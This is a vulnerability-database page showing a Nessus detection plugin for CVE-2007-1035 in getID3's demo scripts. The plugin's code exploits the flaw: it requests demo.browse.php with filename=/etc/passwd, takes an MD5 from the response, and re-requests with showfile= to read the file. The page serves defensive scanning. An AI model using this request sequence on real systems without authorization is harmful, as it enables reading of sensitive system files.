Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2007-2022 and is owned by Tenable, Inc. or an Affiliate thereof.GETID3_178.NASL
HistoryMar 01, 2007 - 12:00 a.m.

getID3 < 1.7.8-b1 Multiple Remote Vulnerabilities

2007-03-0100:00:00
This script is Copyright (C) 2007-2022 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
26
JSON

getID3, a web-based tool for extracting information from MP3 files, is installed on the remote web server.

The installation of getID3 includes a set of demo scripts that allow an unauthenticated, remote attacker to read and delete arbitrary files, write files with some restrictions, and execute arbitrary code, all subject to the privileges under which the web server runs.

Note that getID3 may be installed in support of another application, such as the Drupal Audio or Mediafield modules.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(24746);
  script_version("1.23");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2007-1035");
  script_bugtraq_id(22587);

  script_name(english:"getID3 < 1.7.8-b1 Multiple Remote Vulnerabilities");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by
multiple vulnerabilities.");
  script_set_attribute(attribute:"description", value:
"getID3, a web-based tool for extracting information from MP3 files, is
installed on the remote web server.

The installation of getID3 includes a set of demo scripts that allow
an unauthenticated, remote attacker to read and delete arbitrary
files, write files with some restrictions, and execute arbitrary code,
all subject to the privileges under which the web server runs.

Note that getID3 may be installed in support of another application,
such as the Drupal Audio or Mediafield modules.");
  script_set_attribute(attribute:"see_also", value:"https://www.drupal.org/node/119385");
  # http://sourceforge.net/project/shownotes.php?release_id=476781&group_id=55859
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?e0625253");
  script_set_attribute(attribute:"solution", value:
"Either remove the getID3 'demos' directory or upgrade to getID3
version 1.7.8b1 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:ND");

  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"vuln_publication_date", value:"2007/02/17");
  script_set_attribute(attribute:"plugin_publication_date", value:"2007/03/01");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:drupal:drupal");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:drupal:audio_module");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:drupal:getid3");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:drupal:mediafield_module");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("http_version.nasl", "os_fingerprint.nasl", "drupal_detect.nasl");
  script_require_keys("www/PHP");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("install_func.inc");

port = get_http_port(default:80, embedded:FALSE, php:TRUE);

# Loop through directories.
if (thorough_tests) dirs = list_uniq(make_list("/getid3", cgi_dirs()));
else dirs = make_list(cgi_dirs());

app = "Drupal";
get_install_count(app_name:app, exit_if_zero:FALSE);

installs = get_installs(app_name:app, port:port);
if (!isnull(installs[1]))
{
  foreach install (installs[1])
  {
    dir = install['path'];
    dirs = make_list(dir + "/modules/audio/getid3", dirs);
  }
}

# Determine what to look for.
os = get_kb_item("Host/OS");
if (os && report_paranoia < 2)
{
  if ("Windows" >< os) files = make_list('windows/win.ini', 'winnt/win.ini');
  else files = make_list('etc/passwd');
}
else files = make_list('etc/passwd', 'windows/win.ini', 'winnt/win.ini');

file_pats = make_array();
file_pats['etc/passwd'] = "root:.*:0:[01]:";
file_pats['winnt/win.ini'] = "^\[[a-zA-Z]+\]|^; for 16-bit app support";
file_pats['windows/win.ini'] = "^\[[a-zA-Z]+\]|^; for 16-bit app support";

vuln = FALSE;
non_vuln= make_list();

foreach dir (dirs)
{
  install = build_url(qs:dir, port:port);
  foreach file (files)
  {
    # Try to exploit the flaw to read a file.
    url = "/demos/demo.browse.php";

    # First we need to get the MD5 checksum.
    w = http_send_recv3(method:"GET",
      item: dir + url + "?" +"filename=/" +file,
      port:port,
      exit_on_fail:TRUE
    );
    res = w[2];
    attack_req1 = install + url + "?" +"filename=/" +file;

    md5 = NULL;
    if ("<b>md5_file</b>" >< res)
    {
      pat = '<b>md5_file</b></td><td valign="top">string&nbsp;\\(32\\)</td><td>([^<]+)</td>';
      matches = egrep(pattern:pat, string:res);
      if (matches)
      {
        foreach match (split(matches))
        {
          match = chomp(match);
          m = eregmatch(pattern:pat, string:match);
          if (!isnull(m))
          {
            md5 = m[1];
            break;
          }
        }
      }
    }

    # Try to retrieve the file now that we have the MD5 file.
    if (md5)
    {
      w = http_send_recv3(method:"GET",
        item: dir + url + "?" + "showfile=/" + file + "&" + "md5=" + md5,
        port:port,
        exit_on_fail:TRUE
      );
      res = w[2];

      # There's a problem if there's an entry for root.
      if (egrep(pattern:file_pats[file], string:res))
      {
        attack_req2 = dir + url + "?" + "showfile=/" + file + "&" + "md5="+md5;
        vuln = TRUE;
        break;
      }
      else non_vuln = list_uniq(make_list(non_vuln, install));
    }
    if (vuln)break;
  }
  if (vuln) break;
}

if (vuln)
{
  security_report_v4(
    port        : port,
    severity    : SECURITY_HOLE,
    file        : file,
    request     : make_list(attack_req1, attack_req2),
    output      : chomp(res),
    attach_type : 'text/plain'
  );
  exit(0);
}
else
{
  installs = max_index(non_vuln);
  if (installs == 0) audit(AUDIT_WEB_APP_NOT_INST, 'getID3', port);
  else if (installs == 1) audit(AUDIT_WEB_APP_NOT_AFFECTED, 'getID3', non_vuln[0]);
  else exit(0, "None of the getID3 installs (" + join(non_vuln, sep:" & ") + ") are affected.");
}
VendorProductVersionCPE
drupaldrupalcpe:/a:drupal:drupal
drupalaudio_modulecpe:/a:drupal:audio_module
drupalgetid3cpe:/a:drupal:getid3
drupalmediafield_modulecpe:/a:drupal:mediafield_module

Related

prion 1
cve 1
securityvulns 1
prion
prion
Design/Logic Flaw
2007-02-21 11:28:00
cve
cve
CVE-2007-1035
2007-02-21 11:28:00
securityvulns
securityvulns
Daily web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2007-02-21 00:00:00
JSON
Related for GETID3_178.NASL
prion1cve1securityvulns1